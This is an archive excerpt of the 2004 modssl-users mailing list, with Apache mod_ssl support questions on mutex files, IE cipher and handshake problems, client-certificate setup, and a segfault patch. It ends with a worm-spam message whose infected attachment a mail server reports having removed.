To: "Marco A. Zamora Cunningham" 
Cc: "'modssl-users@modssl.org'" 
Subject: Re: SSLMutex file(s) with IP-Virtuals
References: 
In-Reply-To: 
Content-Type: multipart/alternative;
 boundary="------------030502000905090706000002"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tom Walsh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------030502000905090706000002
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Marco A. Zamora Cunningham wrote:

>>   Secure0: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex0
>>   Secure1: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex1
>>This way I can avoid collisions between the two independant apache 
>>servers running modssl and avoid mutex problems?  My understanding is 
>>    
>>
>
>Off the top of my head, I'd say this won't work: the mutexes are for the SSL
>cache updates, so: since all virtual servers are really running in the same
>pool of Apache httpd processes, they all need access to the same mutexes.
>Furthermore, maybe some of the the modssl functions/libraries assume that
>all modssl processes use the same shared memory/files/whatever.
>
>So, in order to check if your setup works, I'd first set up each virtual
>server as an actual server (each IP with its own set of httpd processes and
>independent configs using -D switches and ifdefs), and then I'd try
>segregating the mutexes, and until that is done, I'd run an SSL connection
>  
>
Perhaps you missed this?  I did setup each IP with it's own httpd 
server, here is the 'pstree -cp':

        |-httpd2(3397)-+-advxsplitlogfil(3404)
        |              |-httpd2(3405)
        |              |-httpd2(3406)
        |              |-httpd2(3407)
        |              |-httpd2(3408)
        |              |-httpd2(3409)
        |              `-httpd2(3450)
        |-httpd2(3415)-+-advxsplitlogfil(3422)
        |              |-httpd2(3423)
        |              |-httpd2(3424)
        |              |-httpd2(3425)
        |              |-httpd2(3426)
        |              `-httpd2(3427)
        |-httpd2(3433)-+-advxsplitlogfil(3440)
        |              |-httpd2(3441)
        |              |-httpd2(3442)
        |              |-httpd2(3443)
        |              |-httpd2(3444)
        |              `-httpd2(3445)


And from 'netstat -apn' snippet:

tcp        0      0 64.179.36.99:80         0.0.0.0:*               
LISTEN      3397/httpd2
tcp        0      0 64.179.36.101:443       0.0.0.0:*               
LISTEN      3433/httpd2
tcp        0      0 64.179.36.100:443       0.0.0.0:*               
LISTEN      3415/httpd2



The goal was to stack three ip addresses into one box, then attach an 
httpd server to each of the ip's.  One name based http server and two IP 
based https servers.  This we have, only I wonder if the SSLMutex 
designation should point to unique filenames or must it be a file that 
is common to all three httpd servers?

Regards,

TomW

-- 
Tom Walsh - WN3L - Embedded Systems Consultant
http://openhardware.net, http://cyberiansoftware.com
"Windows? No thanks, I have work to do..."
----------------------------------------------------



--------------030502000905090706000002
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Marco A. Zamora Cunningham wrote:



  

    
   Secure0: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex0
   Secure1: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex1
This way I can avoid collisions between the two independant apache 
servers running modssl and avoid mutex problems?  My understanding is 
    

  

  

Off the top of my head, I'd say this won't work: the mutexes are for the SSL
cache updates, so: since all virtual servers are really running in the same
pool of Apache httpd processes, they all need access to the same mutexes.
Furthermore, maybe some of the the modssl functions/libraries assume that
all modssl processes use the same shared memory/files/whatever.

So, in order to check if your setup works, I'd first set up each virtual
server as an actual server (each IP with its own set of httpd processes and
independent configs using -D switches and ifdefs), and then I'd try
segregating the mutexes, and until that is done, I'd run an SSL connection
  



Perhaps you missed this?  I did setup each IP with it's own httpd
server, here is the 'pstree -cp':



        |-httpd2(3397)-+-advxsplitlogfil(3404)

        |              |-httpd2(3405)

        |              |-httpd2(3406)

        |              |-httpd2(3407)

        |              |-httpd2(3408)

        |              |-httpd2(3409)

        |              `-httpd2(3450)

        |-httpd2(3415)-+-advxsplitlogfil(3422)

        |              |-httpd2(3423)

        |              |-httpd2(3424)

        |              |-httpd2(3425)

        |              |-httpd2(3426)

        |              `-httpd2(3427)

        |-httpd2(3433)-+-advxsplitlogfil(3440)

        |              |-httpd2(3441)

        |              |-httpd2(3442)

        |              |-httpd2(3443)

        |              |-httpd2(3444)

        |              `-httpd2(3445)





And from 'netstat -apn' snippet:



tcp        0      0 64.179.36.99:80         0.0.0.0:*              
LISTEN      3397/httpd2

tcp        0      0 64.179.36.101:443       0.0.0.0:*              
LISTEN      3433/httpd2

tcp        0      0 64.179.36.100:443       0.0.0.0:*              
LISTEN      3415/httpd2







The goal was to stack three ip addresses into one box, then attach an
httpd server to each of the ip's.  One name based http server and two
IP based https servers.  This we have, only I wonder if the SSLMutex
designation should point to unique filenames or must it be a file that
is common to all three httpd servers?



Regards,



TomW




-- 
Tom Walsh - WN3L - Embedded Systems Consultant
http://openhardware.net, http://cyberiansoftware.com
"Windows? No thanks, I have work to do..."
----------------------------------------------------






--------------030502000905090706000002--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan  3 00:57:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5C8C8A8963; Sat,  3 Jan 2004 00:57:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 48676A8937
	for ; Sat,  3 Jan 2004 00:57:23 +0100 (CET)
Received: (qmail 19227 invoked by uid 65534); 2 Jan 2004 23:57:17 -0000
Received: from pD9E7B11D.dip.t-dialin.net (EHLO bart) (217.231.177.29)
  by mail.gmx.net (mp021) with SMTP; 03 Jan 2004 00:57:17 +0100
X-Authenticated: #13091005
From: =?iso-8859-1?Q?Frank_B=FCttner?= 
To: 
Subject: Problem with AES
Date: Sat, 3 Jan 2004 00:57:14 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcPRjCT+fBGtSlgTRRW1dBQTlDlfFA==
Message-Id: <20040102235723.48676A8937@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Frank_B=FCttner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello i will use the AES-256 encryption. With mozilla it works bur not with
IE. What must i do the IE users get a page with a message to download
mozilla?????


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  5 06:44:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 936F6A8971; Mon,  5 Jan 2004 06:44:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ergobrains.co.jp (mail.ergobrains.co.jp [61.204.41.196])
	by master.modssl.org (Postfix) with ESMTP id 700D0A8937
	for ; Mon,  5 Jan 2004 06:44:23 +0100 (CET)
Received: from y0netan1 (build [192.168.2.176])
	by mail.ergobrains.co.jp (Postfix) with SMTP
	id A5F20115975; Mon,  5 Jan 2004 14:44:13 +0900 (JST)
Date: Mon, 5 Jan 2004 14:44:13 +0900
From: YONETANI Tomokazu 
To: modssl-users@modssl.org
Cc: t-yonetani+modssl@ergobrains.co.jp
Subject: [RESENT][PATCH] segmentation fault at ssl_scache_dbm_retrieve()
Message-ID: <20040105054413.GA85932@ergobrains.co.jp>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="jI8keyz6grp/JLjh"
Content-Disposition: inline
User-Agent: Mutt/1.5.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: YONETANI Tomokazu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--jI8keyz6grp/JLjh
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Hello.
[resending this message because the previous one doesn't seem to
have made it into the archive for some reason]

Sorry if this is a known issue; I've searched the archive and none
relavant found, and http://www.modssl.org/support/bugdb/ was not functioning.

We're using apache-1.3.x+mod_ssl on some of our linux-based web servers,
and have been experiencing occasional crash of apache child process.
After upgrading to apache-1.3.29+mod_ssl-2.8.16 and the crash still
persists, so I decided to use Jeff Trawick's mod_prctl module to
dump core and see exactly what's causing the segfault.
The tracebacks are consistent between crashes, but the local variables
seem to be garbled. After reading the source code, I found two bugs
in ssl_scache_dbm_retrieve():

- memory location pointed to by ucpData is never freed
  (this is already pointed out as Bug 25667 in Apache bug database;
   and the patch against httpd-2.0 is available there)
- ssl_dbm_close(dbm) is called before memcpy(), possibly trashing the
  memory location pointed to by dbmval.dptr(==dbm->pagbuf).

Attached patch should fix these problems. I noticed afterwards that
the version of mod_ssl imported into Apache httpd-2.0 already has
the similar code.

Regards.
-- 
YONETANI Tomokazu / Ergo-Brains Inc.

--jI8keyz6grp/JLjh
Content-Type: application/x-gunzip
Content-Disposition: attachment; filename="ssl_scache_dbm.c.patch.gz"
Content-Transfer-Encoding: base64

H4sICAo49j8CA3NzbF9zY2FjaGVfZGJtLmMucGF0Y2gArVRtb5swEP7c/Ir7VEGAhLxsa5tl
yrRN2qSqkxb1M3LgaKwCjrBpytb9952xoeRlX6ZZiQzH3fl5nrtzEAQgZRbJmMVbjJJNPopH
ouQPF9MwnAXhVTC9gsn1zZvZzXQ+CtsFXngdhgPP806ideA8CCdBOIPJ5GZOv7cngasVBNPw
yn8HntlWqwHolTBV5UCJHrFeHJmeWGZN6/VttP6yXn/7fgdDiVLCEu7ub28Xg0B/vv/09eMP
GFbx7jNTbDHwTo1+97RmT2jT8kJBYUKad8VzjBTg846X9aGtEPuFYTGb+LMJ0aB9Pu946FWi
qsrCAmssvy2jhgth1trRS5SiircOPfmWumuZtA5xJiRqh/6HvFL4HIk0daRrSY6HZoch7BHy
SirYiiwBcoKYZRkvHo5yurDFEn0QivY9l9glIAPkmIuyhkzETHFRwE6QRpiAErCpLY9RslOl
s1zSW/Bhxx42Vep2SbiEtESKYEUCOathg6BKJrdk2mAqyuaMeFcTEPLVGDEZteHjARjFxpQp
zzHhTGFWt8rylOqgIBUVJSfnRhkyOj1gsDStAS8vHV7JfyK8J/lpF6ljSupa0P8eD78G3sW5
ihnrYbnOd4lnu6RjvWOlRPKRVaZ08WgYWKOLXk2vUhv1cQWHoOxBttfJ17Fz4OYktYidJkfb
VZp752p4u/Aqy8mn/0dYL9sI3YQ68ZaVhLRXDe+QnQ8t/H6CSzOwfr8//eNi2aPPoj8/YK9F
ydkjgqyod/WMSFXRdFHzSsWzrOnIBgAmr4USe5JeH+00wrX3DWlqsOpuIietaKfT4cUalTSK
T+hIH3ii/xkWjdJ6vFrN/iozHPdVVUhVIqOROrxMx4Z9724k4N1FanCZ+zaZ8qgX2hDz4bKr
XtdYJmMfpk7bQrUwdVKyaIh/AOrsF/eTBgAA

--jI8keyz6grp/JLjh
Content-Type: application/x-gunzip
Content-Disposition: attachment; filename="bt-20040101.txt.gz"
Content-Transfer-Encoding: base64

H4sICAo39j8CA2J0LTIwMDQwMTAxLnR4dADNlWFv4zQYx19fP4W1TdCO0tlO4tiMvkC7AySm
Q7rpXiBVshzHbaOlTuS43Qbiu/PYSXrbAHE7ToJKUSz3eX75/x8/tk8xQvg+pTjXKdOosmhn
drp9QNMZWrtmhy7qqrioGGdhoBdds2CT6aYsZqjwk9NPyT4lIQlzLIzARUjqulp2WumtkWWx
k854V5mDQdNuie95ItYi1fMJgl9Vhpk0Y6Is0Mm3K5rgFcnztl1hSuDBK0pzeGfff/lzt6IE
71cUMwhL3C/onTiczAFRG7tM6Awp/+zLC/0NTUEgPQrEBX8m8D8RB8JIAsKSURjnIhuFaVXX
hdK38gfjb0zXVY29CklvrHewEhASZeWcGv7Zhc5Re9W0D8Ar1vBjOj1KN3ZTWSNvjbOmDg44
zSenaewYLJRO0nK0sDFets4cZNfr/9A/+87FHoIHAkMD4YVYsAWZnGYDSWih0oGUSKW1af1H
AdgRQAz+FEA+ehGEkQC4ubl+ST4f8zOTi0EATWI1dF0Z6+XW1HXzUSxxZDGefGC9QA3B/84N
IUNzMsLG9ZDbprmVb83dVWOt0T6urYZxbECqVZLOYkv+Tc/Q0PWERjARQvRga+6kfgRs404s
aJ6lc9QZdzAuzuS0PO5N2+z9GMb1HDmzU2XpxsZVCYbUJzMpzOhtVZfS7ndLctS59b6VO1VZ
0JcwJkBgMghUnMcDrU8LMeB2REjlNoB5jkiZ4IBIR0TBWDxI1a2RMXc8aXo3qKsbvyRzZJu7
JcE5FSTBLPtLdSmP6GxEGxUPjda4deN2Muxh2ZcrZnhjldUmLPYzUIZ5AiA2gIpU9wvslS1V
3cCK9V7BoV7CmQDvw1hHnaV/5iVJ4OUjT5m09/wiCMOh63h/A5GMlxEiZbhqJGhzfpD1j1fZ
T2undoj8/68meF6Fj/XX7HSv29fKq3noMuXQ+QwiD6pelK13X3XVr6ZZT321M9LPoGFC6Oxy
sNw6WPB+bnJG0BKRJOecEo6fBPTAyRmFiN8CFt5H4+gERJfhOzGf54xxQn4fAHXVeRBMouCL
c9Qq1xnYd92+9pXdoBI+jc4vIITGkKgFQKOHwP36qYlLCE5i8OAcwqfvr3787h1438E92Ojp
aJOmaYys1mh6jF6it++vr2fwZ/bqFSzm3tk4c/lZKkvT/DHjC3PfVu5hjh7lwv59khyzODxi
LFPY+KjbO4P8FgZ+v16jqoNBVdew6T2KVFPG0mW4L11zB5UIyGn093SRBy+TsySUa2+7amMh
fzCGxqs74+gk9CX0aRbfflVci1VRvVlBQ0/+AJNV5gMqCgAA

--jI8keyz6grp/JLjh--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  6 19:42:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BE881A893F; Tue,  6 Jan 2004 19:42:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from leia.partnersmith.com (leia.partnersmith.com [216.206.190.6])
	by master.modssl.org (Postfix) with ESMTP id A3653A8938
	for ; Tue,  6 Jan 2004 19:42:13 +0100 (CET)
Received: from sslcom.com (vt-williston-cuda1j2-5.sbtnvt.adelphia.net [69.162.181.5])
	by leia.partnersmith.com (8.12.10/8.12.10) with ESMTP id i06Ig5f1012460;
	Tue, 6 Jan 2004 10:42:06 -0800 (PST)
Message-ID: <3FFB0179.6080707@sslcom.com>
Date: Tue, 06 Jan 2004 13:42:01 -0500
From: R McIntosh 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6b) Gecko/20031210
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: apache ssl handshake timeout on ie6 and windows 2000
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: R McIntosh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello OpenSSL and ModSSL users,

I am running apache-1.3.29, mod_ssl-2.8.16-1.3.29, and openssl 0.9.7c.

Users at a specific lan on the internet accessing our cgi application 
sometimes lock at some random place in our application.   Once this 
happens, it will lock up again at the same page if the quit their 
browser and try again.  They are running a patched ie6 on windows 
2000.   We only have this problem with this one client's site.

Here is the error from my log file:

[Tue Dec 30 08:19:10 2003] [error] mod_ssl: SSL handshake timed out 
(client X.X.X.X, server www.partnersmith.com:443)

The ssl-engine log has no additional information.  

When the connection does work, it uses Protocol: SSLv3, Cipher: RC4-MD5 
(128/128 bits)

I have the usual stuff for ie in my httpd.conf:

   SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

I have been researching this with no luck.   I have found hints of 
people having this problem with w2k in the archives but never any solution.

Thank you for your time.
-R
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  7 13:20:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A18EA893F; Wed,  7 Jan 2004 13:20:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60707.mail.yahoo.com (web60707.mail.yahoo.com [216.109.117.230])
	by master.modssl.org (Postfix) with SMTP id 4C54BA8937
	for ; Wed,  7 Jan 2004 13:20:30 +0100 (CET)
Message-ID: <20040107122022.61532.qmail@web60707.mail.yahoo.com>
Received: from [62.129.121.32] by web60707.mail.yahoo.com via HTTP; Wed, 07 Jan 2004 04:20:22 PST
Date: Wed, 7 Jan 2004 04:20:22 -0800 (PST)
From: Matt Stevenson 
Subject: Re: apache ssl handshake timeout on ie6 and windows 2000
To: modssl-users@modssl.org, openssl-users@openssl.org
In-Reply-To: <3FFB0179.6080707@sslcom.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Not much help to you but I'm also seeing this. One
client can hang up 100 apache children. User agent is
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
SD; .NET CLR 1.1.4322)". Lasts for around 2-4 minutes.
(server timeout at 30).

Matt

--- R McIntosh  wrote:
> Hello OpenSSL and ModSSL users,
> 
> I am running apache-1.3.29, mod_ssl-2.8.16-1.3.29,
> and openssl 0.9.7c.
> 
> Users at a specific lan on the internet accessing
> our cgi application 
> sometimes lock at some random place in our
> application.   Once this 
> happens, it will lock up again at the same page if
> the quit their 
> browser and try again.  They are running a patched
> ie6 on windows 
> 2000.   We only have this problem with this one
> client's site.
> 
> Here is the error from my log file:
> 
> [Tue Dec 30 08:19:10 2003] [error] mod_ssl: SSL
> handshake timed out 
> (client X.X.X.X, server www.partnersmith.com:443)
> 
> The ssl-engine log has no additional information.  
> 
> When the connection does work, it uses Protocol:
> SSLv3, Cipher: RC4-MD5 
> (128/128 bits)
> 
> I have the usual stuff for ie in my httpd.conf:
> 
>    SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
> I have been researching this with no luck.   I have
> found hints of 
> people having this problem with w2k in the archives
> but never any solution.
> 
> Thank you for your time.
> -R
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
Yahoo! Hotjobs: Enter the "Signing Bonus" Sweepstakes
http://hotjobs.sweepstakes.yahoo.com/signingbonus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 12 16:51:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 154F5A895E; Mon, 12 Jan 2004 16:51:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server21.ukservers.net (server21.ukservers.net [217.10.138.198])
	by master.modssl.org (Postfix) with ESMTP id 3611FA8934
	for ; Mon, 12 Jan 2004 16:51:27 +0100 (CET)
Received: from FGLAPTOP (host81-136-163-117.in-addr.btopenworld.com [81.136.163.117])
	by server21.ukservers.net (Postfix) with ESMTP id 2605739C418
	for ; Mon, 12 Jan 2004 15:51:22 +0000 (GMT)
From: "Hector Vass" 
To: 
Subject: SSLVerifyClient require
Date: Mon, 12 Jan 2004 15:54:53 -0000
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_005B_01C3D924.6AEDB840"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hector Vass" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_005B_01C3D924.6AEDB840
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

I am having a problem with client authentication getting client certificates
to work -

Have installed the client certificate in internet explorer, this also
installs the server certificate as a 'trusted root certificate'.
When access basic https area of website all works correctly, when attempt to
go into the area where SSLVerifyClient is required, the certificate is
prompted for. But when chosen get "The page cannot be displayed" error.

The error in the ssl_error_log is: [Fri Jan 09 11:37:48 2004] [error]
Re-negotiation handshake failed: Not accepted by client!?

If certificates are viewed IE says that they are valid etc.

I was after references to good HowTo's or any views on whether this is a IE,
modssl, Apache or just a certificates problem.

Thanks in advance


Our server is
Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6mdk) mod_perl/1.99_09
Perl/v5.8.1 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2!

And clients are Internet Explorer IE6 and Opera 7.2

*****
SETUP CERTIFICATES AS FOLLOWS in directory /home/test/CA/:
*****
CERTIFICATION AUTHORITY
Generate New Certification Authority
    perl CA.pl -newca (when prompted I set the CN name to the servers ip
address)

SERVER CERTIFICATE
Generate new certificate request for SERVER (newreq.pem)
    perl CA.pl -newreq (when prompted I set the CN name to the servers ip
address)
Sign it (generates newcert.pem)
    perl CA.pl -sign
Get Key from it
    openssl rsa < newreq.pem > newkey.pem

CLIENT CERTIFICATE
Generate Unencrypted Key for CLIENT
    openssl genrsa -out client_unsecure.key 1024
Generate new certificate request for CLIENT
    openssl req -new -key client_unsecure.key -out client_unsecure.csr (when
prompted I set the CN name to the client ip address)
Sign it
    openssl ca -config //openssl.cnf -policy policy_anything -out
client_unsecure.crt -infiles client_unsecure.csr
Create format for Internet Explorer
    openssl pkcs12 -export -in client_unsecure.crt -inkey
client_unsecure.key -name "Client Cert" -certfile ./demoCA/cacert.pem -out
clientcert.p12


41_MOD_SSL.DEFAULT-VHOST.CONF SETTINGS AS FOLLOWS:
DocumentRoot "/var/www/html/secure"
ErrorLog logs/ssl_error_log

TransferLog logs/ssl_access_log

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLProtocol all
SSLCipherSuite HIGH:MEDIUM

#   Server Certificate:
SSLCertificateFile /home/test/CA/newcert.pem

#   Server Private Key:
SSLCertificateKeyFile /home/test/CA/newkey.pem

#   Server Certificate Chain:

#   Certificate Authority (CA):
SSLCACertificateFile /home/test/CA/demoCA/cacert.pem

#   Certificate Revocation Lists (CRL):

#   Client Authentication (Type):
#SSLVerifyClient require
#SSLVerifyDepth  10


    SSLVerifyClient require
    SSLVerifyDepth  1




------=_NextPart_000_005B_01C3D924.6AEDB840
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable



















I am having a problem with client authentication getting client
certificates to work - 



 



Have installed the client certificate in internet explorer, this =
also
installs the server certificate as a 'trusted root certificate'.  =




When access basic https area of website all works correctly, when
attempt to go into the area where SSLVerifyClient is required, the =
certificate
is prompted for. But when chosen get "The page cannot be =
displayed"
error.



 



The error in the ssl_error_log is: [Fri Jan 09 11:37:48 2004] =
[error]
Re-negotiation handshake failed: Not accepted by client!? =




 



If certificates are viewed IE says that they are valid =
etc.



 



I was after references to good HowTo's or any views on whether =
this is a
IE, modssl, Apache or just a certificates problem.  



 



Thanks in advance



 



 



Our server is



Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6mdk)
mod_perl/1.99_09 Perl/v5.8.1 mod_ssl/2.0.47 OpenSSL/0.9.7b =
PHP/4.3.2!



 



And clients are Internet Explorer IE6 and Opera =
7.2



 



*****



SETUP CERTIFICATES AS FOLLOWS in directory =
/home/test/CA/:



*****



CERTIFICATION AUTHORITY



Generate New Certification =
Authority



    perl =
CA.pl
-newca (when prompted I set the CN name to the servers ip =
address)



 



SERVER CERTIFICATE



Generate new certificate request for SERVER =
(newreq.pem)



    perl =
CA.pl
-newreq (when prompted I set the CN name to the servers ip =
address)



Sign it (generates =
newcert.pem)



    perl =
CA.pl
-sign



Get Key from it



    =
openssl rsa
< newreq.pem > newkey.pem



 



CLIENT CERTIFICATE



Generate Unencrypted Key for =
CLIENT



    =
openssl genrsa
-out client_unsecure.key 1024



Generate new certificate request for =
CLIENT



    =
openssl req
-new -key client_unsecure.key -out client_unsecure.csr (when prompted I =
set the
CN name to the client ip address)



Sign it



    =
openssl ca
-config /<somepath>/openssl.cnf -policy policy_anything -out
client_unsecure.crt -infiles =
client_unsecure.csr



Create format for Internet =
Explorer



    =
openssl pkcs12
-export -in client_unsecure.crt -inkey client_unsecure.key -name =
"Client
Cert" -certfile ./demoCA/cacert.pem -out =
clientcert.p12



 



 



41_MOD_SSL.DEFAULT-VHOST.CONF SETTINGS AS =
FOLLOWS:



DocumentRoot =
"/var/www/html/secure"



ErrorLog logs/ssl_error_log



<IfModule =
mod_log_config.c>



TransferLog =
logs/ssl_access_log



</IfModule>



#   SSL Engine =
Switch:



#   =
Enable/Disable SSL
for this virtual host.



SSLEngine on



 



#   SSL Cipher =
Suite:



#   List the =
ciphers
that the client is permitted to =
negotiate.



#   See the =
mod_ssl
documentation for a complete list.



SSLProtocol all



SSLCipherSuite HIGH:MEDIUM



 



#   Server =
Certificate:



SSLCertificateFile =
/home/test/CA/newcert.pem



 



#   Server =
Private Key:



SSLCertificateKeyFile =
/home/test/CA/newkey.pem



 



#   Server =
Certificate
Chain:



 



#   =
Certificate
Authority (CA):



SSLCACertificateFile =
/home/test/CA/demoCA/cacert.pem



 



#   =
Certificate
Revocation Lists (CRL):



 



#   Client
Authentication (Type):



#SSLVerifyClient require



#SSLVerifyDepth  =
10



 



<Location /audit>



   
SSLVerifyClient require



   
SSLVerifyDepth  =
1



</Location>



 



 <=
/p>








------=_NextPart_000_005B_01C3D924.6AEDB840--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 19 03:18:45 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69724A8966; Mon, 19 Jan 2004 03:18:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns8.sony.co.jp (NS8.Sony.CO.JP [137.153.0.33])
	by master.modssl.org (Postfix) with ESMTP id 4E20FA8937
	for ; Mon, 19 Jan 2004 03:18:24 +0100 (CET)
Received: from mail3.sony.co.jp (mail3.sony.co.jp [43.0.1.203])
Received: from mail3.sony.co.jp (localhost [127.0.0.1])
	by mail3.sony.co.jp (R8/Sony) with ESMTP id i0J2IIQ28457
	for ; Mon, 19 Jan 2004 11:18:18 +0900 (JST)
Received: from sshinozaki ([43.17.38.34])
	by mail3.sony.co.jp (R8/Sony) with SMTP id i0J2I7g28199
	for ; Mon, 19 Jan 2004 11:18:07 +0900 (JST)
Date: Mon, 19 Jan 2004 11:19:10 +0900
To: modssl-users@modssl.org
Subject: Hi
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------101446678566660"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------101446678566660
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Test =)
qpjwqrjwilonrmx
--
Test, yep.

----------101446678566660
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit


------------------  Virus Warning Message (on the network)

yrecxfxqlc.exe is removed from here because it contains a virus.

---------------------------------------------------------
----------101446678566660
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit

------------------  Virus Warning Message (on the network)

Found virus WORM_BAGLE.A in file yrecxfxqlc.exe
The file is deleted.

Therefore we removed the attachment-file
by Mail Server and sent the message to you.

(Japanese)
$BK\%a!<%k$KE:IU$5$l$F$$$?%U%!%$%k$K%&%#%k%9$,46@w$7$F$*$j$^$7$?!#(B
$B$=$N$?$a!"%a!<%k%5!<%P$K$h$C$FE:IU%U%!%$%k$r
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
